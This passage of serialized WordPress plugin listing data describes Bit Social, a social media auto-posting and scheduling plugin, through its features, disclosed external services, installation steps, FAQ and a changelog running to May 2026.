ugc\">Threads</a></li>\n</ul>\n<p>This expanded platform support allows businesses and creators to distribute content across a much wider audience.</p>\n<h3>Feature Comparison</h3>\n<h4>Features Included in Both Free and Pro</h4>\n<p>These core features are available in both versions of Bit Social:</p>\n<ul>\n<li>Connect unlimited social media accounts</li>\n<li>Unlimited auto posting</li>\n<li>Unlimited scheduling</li>\n<li>Filter posts by category, tag, and ID</li>\n<li>Filter posts by publish time</li>\n<li>Share custom messages</li>\n<li>Auto share posts</li>\n<li>Share Now feature</li>\n<li>Activity logs for monitoring post status</li>\n<li>Filter hook (bit_social_post_data) for developers</li>\n</ul>\n<p>These features allow users to automate their social publishing workflow without limitations on the number of posts or accounts.</p>\n<h4>Free Features</h4>\n<p>The free version includes:</p>\n<ul>\n<li>Templates for Facebook and LinkedIn</li>\n<li>11 smart tags for dynamic content</li>\n<li>Auto share media using the featured image or link card</li>\n<li>Essential scheduling features</li>\n</ul>\n<p>This feature set is suitable for bloggers and smaller websites that want a simple automation setup.</p>\n<h4>Pro Features</h4>\n<p>The Pro version expands functionality significantly and includes:</p>\n<ul>\n<li>Group multiple social media accounts</li>\n<li>Advanced scheduling tools</li>\n<li>Templates for all supported platforms</li>\n<li>Auto share media, including product images and galleries</li>\n<li>Auto share WooCommerce products</li>\n<li>Auto share pages, and custom post types</li>\n<li>Full smart tag library</li>\n<li>Advanced Calendar view</li>\n<li>Advanced Cron settings</li>\n<li>Auto share custom post types</li>\n<li>Delay controls for platform publishing</li>\n<li>LinkedIn page support</li>\n<li>AI prompts for content generation with ChatGPT (OpenAI)</li>\n<li>DALL·E powered image generation</li>\n</ul>\n<p>These features allow businesses to build advanced social automation workflows and manage more complex campaigns.</p>\n<p>Bit Social provides a complete <strong>Social Media Auto Poster and Scheduler for WordPress</strong>, allowing you to automate publishing, manage scheduling, promote WooCommerce products, and streamline your entire social media workflow from a single dashboard.</p>\n<h3>Explore Our Other Products :</h3>\n<ul>\n<li><a href=\"https://bit-form.com/\" rel=\"nofollow ugc\">Bit Form</a>: A beginner-friendly WordPress form builder that lets you create multi-step and conversational forms with a smart drag-and-drop builder. Build, customize, and convert with the lightning-fast form solution</li>\n<li><a href=\"https://bit-integrations.com/\" rel=\"nofollow ugc\">Bit Integrations</a>: A no-code WordPress automation plugin that lets you connect 320+ apps and services to automate your workflows in minutes. It connects your forms, CRMs, LMS, and eCommerce tools all inside WordPress.</li>\n<li><a href=\"https://bitassist.co/\" rel=\"nofollow ugc\">Bit Assist</a>: Connect all your customer support channels with a single button. Integrate Floating Chat Widget, WhatsApp, Email, SMS, Telegram, Messenger, and more with Bit Assist.</li>\n<li><a href=\"https://bit-flows.com/\" rel=\"nofollow ugc\">Bit Flows</a>: Bit Flows is a powerful WordPress automation plugin that lets you create unlimited multi-step workflows. It also includes an AI agent and advanced tools like Router, Repeater, Iterator, and a JSON parser.</li>\n<li><a href=\"https://bitapps.pro/bit-smtp/\" rel=\"nofollow ugc\">Bit File Manager</a>: Bit File Manager is a WordPress plugin for easy file management. Upload, organize, and control from your WordPress dashboard.</li>\n<li><a href=\"https://bitapps.pro/bit-smtp/\" rel=\"nofollow ugc\">Bit SMTP</a>: Ensures reliable email delivery by integrating SMTP services into WordPress, preventing email issues.</li>\n</ul>\n<h3>External Services</h3>\n<p><strong>LinkedIn API</strong> (<code>api.linkedin.com</code>, <code>linkedin.com</code>)</p>\n<ul>\n<li><strong>What it does</strong>: Connects a LinkedIn account and publishes posts to LinkedIn from WordPress.</li>\n<li><strong>What data is sent</strong>: Access tokens, account identifiers, and post payload data (text, links, media URLs, and metadata required by LinkedIn endpoints).</li>\n<li>When data is sent: When an administrator connects/reconnects a LinkedIn account and when a post is published or scheduled to LinkedIn.</li>\n<li><strong>Why is it required</strong>: LinkedIn publishing and account authorization cannot work without LinkedIn APIs.</li>\n<li><strong><a href=\"https://www.linkedin.com/legal/user-agreement\" rel=\"nofollow ugc\">Terms of Service</a></strong></li>\n<li><strong><a href=\"https://www.linkedin.com/legal/privacy-policy\" rel=\"nofollow ugc\">Privacy Policy</a></strong></li>\n</ul>\n<p><strong>Facebook Graph API</strong> (<code>graph.facebook.com</code>)</p>\n<ul>\n<li><strong>What it does</strong>: Connects Facebook Pages/Profiles and publishes scheduled or instant posts to Facebook.</li>\n<li><strong>What data is sent</strong>: Access tokens, page/account IDs, and post content data (message text, links, image/video URLs, and publish parameters).</li>\n<li><strong>When data is sent</strong>: During Facebook account authorization and each time a Facebook post is published from the plugin.</li>\n<li><strong>Why is it required</strong>: Facebook posting and page/account synchronization depend on Facebook Graph API endpoints.</li>\n<li><strong><a href=\"https://www.facebook.com/terms.php\" rel=\"nofollow ugc\">Terms of Service</a></strong></li>\n<li><strong><a href=\"https://www.facebook.com/privacy/policy/\" rel=\"nofollow ugc\">Privacy Policy</a></strong></li>\n</ul>\n<p><strong>BitApps Auth Server</strong> (<code>auth-apps.bitapps.pro</code>)</p>\n<ul>\n<li><strong>What it does</strong>: Handles the plugin’s account/authentication exchange for supported social integrations.</li>\n<li><strong>What data is sent</strong>: Site URL/domain, integration state parameters, redirect/auth callback data, and temporary authorization credentials needed to complete account connection.</li>\n<li><strong>When data is sent</strong>: Only when an administrator starts or completes a social account connection flow from plugin settings.</li>\n<li><strong>Why is it required</strong>: The plugin uses this service as the authorization broker to complete secure OAuth/app connection flows.</li>\n<li><strong><a href=\"https://bitapps.pro/terms-of-service/\" rel=\"nofollow ugc\">Terms of Service</a></strong></li>\n<li><strong><a href=\"https://bitapps.pro/privacy-policy/\" rel=\"nofollow ugc\">Privacy Policy</a></strong></li>\n</ul>\n<h3>Why Is My Post Not Publishing Properly?</h3>\n<p>When publishing your WordPress posts to social media platforms with Bit Social, various issues can cause failures. Understanding these problems can help you fix them. This section explains common reasons why publishing WordPress posts might fail and offers solutions to ensure your content is shared successfully.</p>\n<p>Here are some possible reasons why publishing or scheduling your posts might fail.</p>\n<ul>\n<li>If the social platforms APIs change</li>\n<li>If cron jobs were not set up or did not work properly</li>\n<li>If there is a network failure</li>\n</ul>\n<p><a href=\"https://bit-social.com/documentation/other/why-your-post-publishing-might-fail-using-bit-social/\" rel=\"nofollow ugc\">Why your post publishing might fail using Bit-Social</a></p>\n\";s:12:\"installation\";s:349:\"<ol>\n<li>Download the plugin.</li>\n<li>From the WordPress Admin Panel, click on Plugins =&gt; Add New.</li>\n<li>Click on Upload, so you can directly upload your plugin zip file.</li>\n<li>Use the browse button to select the plugin zip file that was downloaded, and then click on Install Now.</li>\n<li>Once installed, click “Activate”.</li>\n</ol>\n\";s:3:\"faq\";s:2735:\"\n<dt id=\"how%20can%20i%20automatically%20share%20wordpress%20posts%20to%20social%20media%3F\">\nHow can I automatically share WordPress posts to social media?\n</h4>\n<p>\n<p>Bit Social allows you to automatically share WordPress posts to connected social media platforms. Once your accounts are connected, the plugin can publish posts when they are published or scheduled, helping you promote content without manual sharing.</p>\n</p>\n<dt id=\"how%20do%20i%20schedule%20wordpress%20posts%20to%20social%20media%3F\">\nHow do I schedule WordPress posts to social media?\n</h4>\n<p>\n<p>Bit Social includes a built-in social media scheduler that lets you plan and schedule posts in advance. You can choose publishing times and automatically publish content to your connected social media accounts.</p>\n</p>\n<dt id=\"can%20i%20auto%20post%20woocommerce%20products%20to%20social%20media%3F\">\nCan I auto post WooCommerce products to social media?\n</h4>\n<p>\n<p>Yes. Bit Social supports WooCommerce product sharing. When a product is published or updated, the plugin can automatically share it to your connected social media platforms.</p>\n</p>\n<dt id=\"can%20i%20connect%20multiple%20social%20media%20accounts%3F\">\nCan I connect multiple social media accounts?\n</h4>\n<p>\n<p>Yes. You can connect multiple accounts for each platform and share posts across them. This is helpful for agencies or businesses managing multiple brands.</p>\n</p>\n<dt id=\"can%20i%20schedule%20posts%20for%20different%20platforms%20at%20different%20times%3F\">\nCan I schedule posts for different platforms at different times?\n</h4>\n<p>\n<p>Yes. Bit Social allows you to set <strong>different schedule times for each platform</strong>. This helps you optimize posting times based on where your audience is most active.</p>\n</p>\n<dt id=\"can%20i%20re-share%20old%20wordpress%20posts%3F\">\nCan I re-share old WordPress posts?\n</h4>\n<p>\n<p>Yes. Bit Social allows you to re-share old posts. This helps promote evergreen content and keeps your social media accounts active.</p>\n</p>\n<dt id=\"does%20bit%20social%20work%20if%20my%20website%20has%20low%20traffic%3F\">\nDoes Bit Social work if my website has low traffic?\n</h4>\n<p>\n<p>Yes. Bit Social supports External Cron, which helps scheduled posts run even when your website has low traffic.</p>\n</p>\n<dt id=\"how%20do%20i%20install%20bit%20social%3F\">\nHow do I install Bit Social?\n</h4>\n<p>\n<p>Go to <strong>Plugins</strong> <span aria-hidden=\"true\" class=\"wp-exclude-emoji\">→</span> <strong>Add New</strong> in your WordPress dashboard and search for <strong>Bit Social</strong>. Click <strong>Install</strong> and then <strong>Activate</strong> the plugin. After activation, connect your social accounts to start sharing posts.</p>\n</p>\n\n\";s:9:\"changelog\";s:23230:\"<h4>v1.13.10 (May 7, 2026)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>Pinterest: Added fallback to wp_remote_get when file_get_contents is blocked by Cloudflare or WAF, preventing image upload failures on restricted server environments.</li>\n<li>PHP compatibility: Removed trait constants to support PHP versions below 8.2.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.13.9 (April 29, 2026)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>Google Business Profile: Resolved an issue where accounts were not found when retrying post publishing.</li>\n<li>Images: Normalized social post images by converting unsupported formats (e.g. WebP <span aria-hidden=\"true\" class=\"wp-exclude-emoji\">→</span> JPEG) and resizing oversized media for Facebook, LinkedIn, and Google Business Profile.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.13.7 (April 22, 2026)</h4>\n<ul>\n<li>others:\n<ul>\n<li>Minor bug fixes, performance improvements, and compatibility updates for the latest WordPress version.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.13.6 (April 08, 2026)</h4>\n<ul>\n<li>Improvements:\n<ul>\n<li>Template Settings by fixing previous issues and enhancing overall stability and usability.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.13.5 (April 02, 2026)</h4>\n<ul>\n<li>Others:\n<ul>\n<li>Updated dependencies to the latest version.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.13.4 (March 30, 2026)</h4>\n<ul>\n<li>Improvements:\n<ul>\n<li>Smart tag: {post_categories} and {post_tags} now return plain text. Enhanced {hashtags_[post_categories]} to generate clean camelCase hashtags like #postCategories.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.13.3 (March 14, 2026)</h4>\n<ul>\n<li>Improvements:\n<ul>\n<li>Enhanced scheduling performance to handle large numbers of posts more reliably.</li>\n<li>Improved Specific ID selection to work correctly when selecting a larger number of posts.</li>\n<li>Ensured the scheduling system maintains correct sequential publishing order during processing.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.13.2 (March 10, 2026)</h4>\n<ul>\n<li>Improvements:\n<ul>\n<li>Threads: Added a media readiness check before publishing and improved error handling for failed or expired media containers.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.13.1 (February 25, 2026)</h4>\n<ul>\n<li>Security:\n<ul>\n<li>Hardened AJAX auto-post flow with strict nonce, capability, and post ID validation.</li>\n</ul>\n</li>\n<li>Compliance:\n<ul>\n<li>Added external services and build/source-code documentation for WordPress.org review.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.13.0 (February 18, 2026)</h4>\n<ul>\n<li>Features:\n<ul>\n<li>WP scheduled posts: Added a new post order option starts from the oldest posts and continues to the latest (including upcoming posts).</li>\n<li>Added a new Smart Tag: {post_date} for inserting the post publish date.</li>\n</ul>\n</li>\n<li>Improvements:\n<ul>\n<li>Improved hashtag formatting:\n<ul>\n<li>Previous: #new #year</li>\n<li>Now: #newYear</li>\n</ul>\n</li>\n<li>Trimmed Threads topic text to 50 characters to prevent posting errors.</li>\n</ul>\n</li>\n<li>Fixed:\n<ul>\n<li>Few minor bug fixes &amp; improvements</li>\n</ul>\n</li>\n</ul>\n<h4>v1.13.1 (February 25, 2026)</h4>\n<ul>\n<li>Security:\n<ul>\n<li>Hardened AJAX auto-post flow with strict nonce, capability, and post ID validation.</li>\n<li>Improved upload handling and input sanitization for safer media processing.</li>\n</ul>\n</li>\n<li>Compliance:\n<ul>\n<li>Added external services and build/source-code documentation for WordPress.org review.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.12.1 (February 02, 2026)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>Few minor bug fixes &amp; improvements</li>\n</ul>\n</li>\n</ul>\n<h4>v1.12.0 (January 23, 2026)</h4>\n<ul>\n<li>Features:\n<ul>\n<li>Pinterest: Users can now set a custom title directly from the Pinterest template settings for better control and personalization.</li>\n<li>Tumblr: Tumblr templates now support HTML URLs, allowing more flexible and dynamic content rendering.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.11.0 (January 19, 2026)</h4>\n<ul>\n<li>Features:\n<ul>\n<li>Added an “Add a Button” select option in the WP Post schedule template for Google Business Profile, allowing users to choose CTA buttons</li>\n</ul>\n</li>\n</ul>\n<h4>v1.10.0 (January 12, 2026)</h4>\n<ul>\n<li>\n<p>Features:</p>\n<ul>\n<li>\n<p>AI Prompts enable dynamic control over WordPress post content and images using reusable prompt templates.</p>\n<ul>\n<li>Supports Smart Tags to inject WordPress post data into prompts at runtime</li>\n<li>Text prompts generate captions, descriptions, or rewritten content</li>\n<li>Image prompts generate AI images based on post title, content, or custom instructions</li>\n<li>Prompts execute during scheduling or publishing</li>\n<li>\n<p>Includes model, temperature, and fallback configuration</p>\n<p>This allows automated, consistent, and customizable AI-generated content across posts and platforms.</p>\n</li>\n</ul>\n</li>\n<li>\n<p>WP Schedule – Custom Image Selection</p>\n<ul>\n<li>WordPress post schedules now support custom image selection.</li>\n<li>Choose specific images instead of default featured images</li>\n<li>Better control over post visuals per schedule</li>\n<li>Useful for platform-specific image optimization</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul>\n<h4>v1.9.0 (December 17, 2025)</h4>\n<ul>\n<li>\n<p>Improvement:</p>\n<ul>\n<li>Smart Tag Cursor Support: Smart tag values are now inserted at the current cursor position instead of the end of the text box.</li>\n<li>Post Filter Multi-Language Support: Post filtering now supports multi-language posts, categories, and tags.</li>\n</ul>\n</li>\n<li>\n<p>Fixed:</p>\n<ul>\n<li>Thread Content Length Fix: Thread content is now properly trimmed to the maximum allowed length.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.8.1 (November 27, 2025)</h4>\n<ul>\n<li>Few minor bug fixes &amp; improvements.</li>\n</ul>\n<h4>v1.8.0 (November 24, 2025)</h4>\n<ul>\n<li>\n<p>Features:</p>\n<ul>\n<li>\n<p>Hook: Action Hooks for Social Media Publishing. A total of 14 new action hooks have been added to enhance extensibility and automation in Bit Social.</p>\n</li>\n<li>\n<p>Each social media platform now has its own publish hook (bit_social_{platform}_post_publish) that fires after a post is published and returns post details (content, media, link, comment) and response details (account_name, account_id, post_url, status).</p>\n</li>\n<li>\n<p>bit_social_all_platforms_post_publish fires once after publishing across all selected platforms and returns all combined platform post data.</p>\n</li>\n</ul>\n</li>\n</ul>\n<h4>v1.7.3 (November 15, 2025)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>SQL join error in the debug log when the group was empty.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.7.2 (November 10, 2025)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>Create Schedule: Posts are now published in a random order without duplicates, instead of following a fixed sequence.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.7.1 (October 29, 2025)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>WP Auto Post: Issue with auto-posting old draft posts after publishing has been resolved.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.7.0 (September 29, 2025)</h4>\n<ul>\n<li>Features:\n<ul>\n<li>Smart tag: A new tag {product_sku} has been added, allowing you to dynamically display the SKU of your product.</li>\n</ul>\n</li>\n<li>Improvement:\n<ul>\n<li>Pinterest title handling to ensure proper formatting and compatibility.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.6.0 (September 22, 2025)</h4>\n<ul>\n<li>Features:\n<ul>\n<li>Smart tag: New advance smart tag {hashtags_[key_name]} for post tags, categories, and product tags. Also added {product_tags} and {product_link}.</li>\n</ul>\n</li>\n<li>Improvement:\n<ul>\n<li>Product description now strips all HTML tags for cleaner output.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.5.5 (September 16, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>LinkedIn posting by escaping unsupported special characters in content.</li>\n<li>Added support for WooCommerce product gallery images in the All Images smart tag.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.5.4 (August 28, 2025)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>Old schedules now sync correctly when a new platform is added, ensuring all templates stay updated across platforms</li>\n</ul>\n</li>\n</ul>\n<h4>v1.5.3 (August 21, 2025)</h4>\n<ul>\n<li>Feature:\n<ul>\n<li>Action Hook: Added <code>bit_social_log_data</code> hook to track and extend schedule logs (ID, platform, status, and details).</li>\n</ul>\n</li>\n</ul>\n<h4>v1.5.2 (August 20, 2025)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>Plugin loading order to avoid conflicts between Free and Pro versions.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.5.1 (August 20, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Linkedin: Optimized LinkedIn link card posts to display correctly and improved handling of expired tokens to prevent posting errors.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.5.0 (August 17, 2025)</h4>\n<ul>\n<li>Integration:\n<ul>\n<li>Threads: Create single and carousel posts with topic, and first comment for streamlined social media management!</li>\n</ul>\n</li>\n</ul>\n<h4>v1.4.4 (August 10, 2025)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>Admin menu CSS conflicts: reset submenu position and hide screen meta links to fix third-party plugin issues.</li>\n<li>Popup issue: changelog popup no longer reappears after skipping.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.4.3 (July 24, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Bluesky: Hashtags (e.g. #example) are now automatically detected and formatted according to Bluesky standards. Hyperlinks starting with http:// or https:// are also recognized and included as clickable links in the post content.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.4.1 (July 17, 2025)</h4>\n<ul>\n<li>Integration:\n<ul>\n<li>Telegram: Send text messages, images, and clickable links directly to Telegram groups and channels</li>\n</ul>\n</li>\n<li>Improvement:\n<ul>\n<li>Google Business Profile: Updated character limits — now supports 1,500 characters for the description.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.4.0 (July 12, 2025)</h4>\n<ul>\n<li>Features:\n<ul>\n<li>Filter Hook: Developers can now customize post data using the bit_social_post_data filter.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.3.9 (July 03, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Localization: added localization support with language files and more translatable strings.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.3.8 (June 30, 2025)</h4>\n<ul>\n<li>Integration:\n<ul>\n<li>Line : Send text messages, images, and clickable links directly to LINE groups and individual users — perfect for engaging your audience in real time!</li>\n</ul>\n</li>\n</ul>\n<h4>v1.3.7 (June 05, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Bluesky: Improved handling of Bluesky API responses for external URL embeds by falling back to the original URL when some links return empty responses.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.3.6 (June 02, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Pinterest: switched to base64 for media upload to fix broken link issues and ensure faster, more reliable pin publishing.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.3.5 (May 18, 2025)</h4>\n<ul>\n<li>Integration:\n<ul>\n<li>Bluesky: Create posts with links, rich cards, single or multiple images, and  first comment!.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.3.4 (April 24, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Localization: Added more strings to translate.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.3.3 (April 23, 2025)</h4>\n<ul>\n<li>\n<p>Integration:</p>\n<ul>\n<li>TikTok: Create posts with your authorized custom app — one-click connect coming soon!</li>\n</ul>\n</li>\n<li>\n<p>Features:</p>\n<ul>\n<li>Re-Schedule Button: Allows you to modify and reschedule previously completed or missed schedules.</li>\n<li>Smart Tags: A new tag {post_excerpt_short_40} has been added, allowing you to dynamically shorten the length of your post excerpt to any specified number of characters.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.3.2 (March 29, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>X (twitter): Verified and unverified account checks for posting.</li>\n<li>Trimmed post length for verified accounts.</li>\n</ul>\n</li>\n</ul>\n<p>*Fixed<br />\n   *X (twitter): unusual post link text trimming issue.</p>\n<h4>v1.3.1 (March 12, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Wp Auto Post: Now detects AI to WordPress posts for seamless auto-posting.</li>\n<li>License Activation: Automatic for existing Multisite setups; new sites require manual connection. Users can now activate and deactivate plugin licenses directly from the support page.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.3.0 (March 03, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Supports all custom post type&#8217;s taxonomies (tags &amp; category) in Smart Tag!</li>\n</ul>\n</li>\n</ul>\n<h4>v1.2.9 (February 27, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Optimized log table data rendering for improved performance and user experience.</li>\n<li>Implemented log table filtering functionality for enhanced data navigation and accessibility.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.2.8 (February 22, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Instagram template: Trim Message.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.2.7 (January 30, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Localization: Added more strings to translate.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.2.6 (January 07, 2025)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Localization: Added more strings to translate.</li>\n<li>Pinterest: Long title will be trimmed automatically.</li>\n<li>License: Activate or deactivate plugins from the support page.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.2.5 (December 30, 2024)</h4>\n<ul>\n<li>Integration:\n<ul>\n<li>Instagram: Create single and carousel posts with caption, and first comment for streamlined social media management!</li>\n</ul>\n</li>\n</ul>\n<h4>v1.2.3 (December 22, 2024)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Post content now displays with HTML entities decoded for improved readability and a better user experience!</li>\n</ul>\n</li>\n</ul>\n<h4>v1.2.2 (December 12, 2024)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>Database migration issue</li>\n</ul>\n</li>\n</ul>\n<h4>v1.2.1 (December 11, 2024)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Plugin layout style</li>\n</ul>\n</li>\n</ul>\n<h4>v1.2.0 (December 11, 2024)</h4>\n<ul>\n<li>Improvement:\n<ul>\n<li>Wp Post Schedule Account select</li>\n<li>Layout style</li>\n</ul>\n</li>\n</ul>\n<h4>v1.1.9 (December 10, 2024)</h4>\n<ul>\n<li>Features:\n<ul>\n<li>Group: This feature allows multiple accounts to be organized into custom groups, making bulk posting and multi-account publishing easier and more efficient.</li>\n</ul>\n</li>\n</ul>\n<h4>v1.1.8 (December 01, 2024)</h4>\n<ul>\n<li>\n<p>Improvements:</p>\n<ul>\n<li>WordPress post schedule</li>\n</ul>\n</li>\n<li>\n<p>Fixed:</p>\n<ul>\n<li>Share Now draft post publish</li>\n</ul>\n</li>\n</ul>\n<h4>v1.1.7 (November 21, 2024)</h4>\n<ul>\n<li>\n<p>Feature:</p>\n<ul>\n<li>Link: Share the post link on Pinterest.</li>\n</ul>\n</li>\n<li>\n<p>Improvements:</p>\n<ul>\n<li>Pinterest media share</li>\n</ul>\n</li>\n</ul>\n<h4>v1.1.6 (November 18, 2024)</h4>\n<ul>\n<li>Improvements:\n<ul>\n<li>Google business profile account connect</li>\n</ul>\n</li>\n</ul>\n<h4>v1.1.5 (November 14, 2024)</h4>\n<ul>\n<li>Improvements:\n<ul>\n<li>Sleep time overnight range support</li>\n<li>Post filter custom taxonomies support</li>\n</ul>\n</li>\n</ul>\n<p>*Fixed:<br />\n   *Media library style</p>\n<h4>v1.1.4 (October 28, 2024)</h4>\n<ul>\n<li>Others:\n<ul>\n<li>Updated dependencies to latest versions</li>\n</ul>\n</li>\n</ul>\n<h4>v1.1.3 (October 23, 2024)</h4>\n<ul>\n<li>Improvements:\n<ul>\n<li>Account list response on account connect modal</li>\n<li>X (twitter) multiple redirect/callback url support</li>\n</ul>\n</li>\n</ul>\n<h4>v1.1.2 (October 15, 2024)</h4>\n<ul>\n<li>\n<p>Features:</p>\n<ul>\n<li>Integrate with MetaBox, Pods, ACF, JetEngine &amp; all custom post types and custom fields plugins</li>\n<li>Integrate with Custom Post Type UI &amp; Others</li>\n<li>Smart Tag Filter Hooks</li>\n<li>Auto Post Custom Delay Time</li>\n</ul>\n</li>\n<li>\n<p>Improvements:</p>\n<ul>\n<li>Implemented a background process for auto posting to enhance performance and reduce UI delays.</li>\n<li>Smart Tags</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.47 (October 07, 2024)</h4>\n<ul>\n<li>Improvements:\n<ul>\n<li>Social platform connect</li>\n<li>External cron enable </li>\n<li>Added Google Business Profile call to action button in share now</li>\n<li>Smart tag post full content</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.41 (September 30, 2024)</h4>\n<ul>\n<li>\n<p>Improvements:</p>\n<ul>\n<li>WP Schedule post filter categories and tags</li>\n</ul>\n</li>\n<li>\n<p>Fix:</p>\n<ul>\n<li>Auto post settings delay= v1.0.39 (September 28, 2024) =</li>\n</ul>\n</li>\n<li>\n<p>Features:</p>\n<ul>\n<li>Auto post settings delay</li>\n</ul>\n</li>\n<li>\n<p>Improvements:</p>\n<ul>\n<li>Post content smart tags</li>\n<li>WP Schedule post filter</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.37 (September 23, 2024)</h4>\n<ul>\n<li>Features:\n<ul>\n<li>WooCommerce product post</li>\n<li>WooCommerce smart tags</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.36 (September 21, 2024)</h4>\n<ul>\n<li>\n<p>Fixed:</p>\n<ul>\n<li>Internal bug fixes</li>\n</ul>\n</li>\n<li>\n<p>Improvements:</p>\n<ul>\n<li>Facebook Connect (automatically connect your FB account without any credentials)</li>\n<li>WordPress 6.6.2 compatibility</li>\n<li>Code improvement and optimization</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.22 (September 10, 2024)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>Internal bug fixes</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.21 (July 16, 2024)</h4>\n<ul>\n<li>\n<p>Fixed:</p>\n<ul>\n<li>Auto post settings issue</li>\n<li>Missed schedule not removing cron event</li>\n</ul>\n</li>\n<li>\n<p>Improvements:</p>\n<ul>\n<li>Close button on long filter</li>\n<li>Warning and notes to show information</li>\n<li>Delete button misplace on the log table</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.20 (July 15, 2024)</h4>\n<ul>\n<li>\n<p>Feature:</p>\n<ul>\n<li>Reset button added on schedule modal to clear form.</li>\n<li>Filter tag added on the logs.</li>\n</ul>\n</li>\n<li>\n<p>Fixed:</p>\n<ul>\n<li>On schedule and share now submit button not working!</li>\n<li>Log filter issue fixed!</li>\n<li>Schedule modal not closing!</li>\n<li>Js error on schedule modal!</li>\n<li>Schedule time mismatch issue!</li>\n<li>Account remains after deleting on wp auto post!</li>\n<li>Retry no working on linkedin log!</li>\n</ul>\n</li>\n<li>\n<p>Improvements:</p>\n<ul>\n<li>Template ui change to improve user experience</li>\n<li>YouTube tutorial link added</li>\n<li>Notes added to multiple module improve ux</li>\n<li>Local time visibility improved</li>\n<li>Preview of social template changed</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.19 (July 09, 2024)</h4>\n<ul>\n<li>\n<p>Fixed:</p>\n<ul>\n<li>Auto posting without enabling setting!</li>\n<li>Post interval taking negative value!</li>\n<li>Schedule modal not closing!</li>\n<li>Share now set up schedule starting time issue!</li>\n</ul>\n</li>\n<li>\n<p>Improvements:</p>\n<ul>\n<li>Initial loading time decrease by reducing resource size!</li>\n<li>Loader on all switching button!</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.18 (July 08, 2024)</h4>\n<ul>\n<li>\n<p>Fixed:</p>\n<ul>\n<li>LinkedIn feature image publishing issue!</li>\n<li>LinkedIn link card post doesn&#8217;t contain thumbnail image!</li>\n<li>Immediate post after updating content on share now!</li>\n<li>Immediate post after updating content on schedule!</li>\n</ul>\n</li>\n<li>\n<p>Improvements:</p>\n<ul>\n<li>Changes style in account</li>\n<li>Necessary documentation link added</li>\n<li>Added account connect to the share now, schedule and auto-post</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.17 (June 27, 2024)</h4>\n<ul>\n<li>Fixed:\n<ul>\n<li>LinkedIn post not published automatically!</li>\n<li>Google Business Profile schedule issue!</li>\n</ul>\n</li>\n</ul>\n<h4>v1.0.16 (June 26, 2024)</h4>\n<ul>\n<li>Improvements:\n<ul>\n<li>State of authorization systems handled more efficiently!</li>\n<li>Back button and notification added on authorization modal to improve user experience!</li>\n<li>Select account confirmation before enabling the auto post settings!</li>\n</ul>\n</li>\n<li>Fixed:\n<ul>\n<li>Auto post not working with or without feature image!</li>\n<li>One-Click connect was not working on the first time!</li>\n<li>On sub-directory 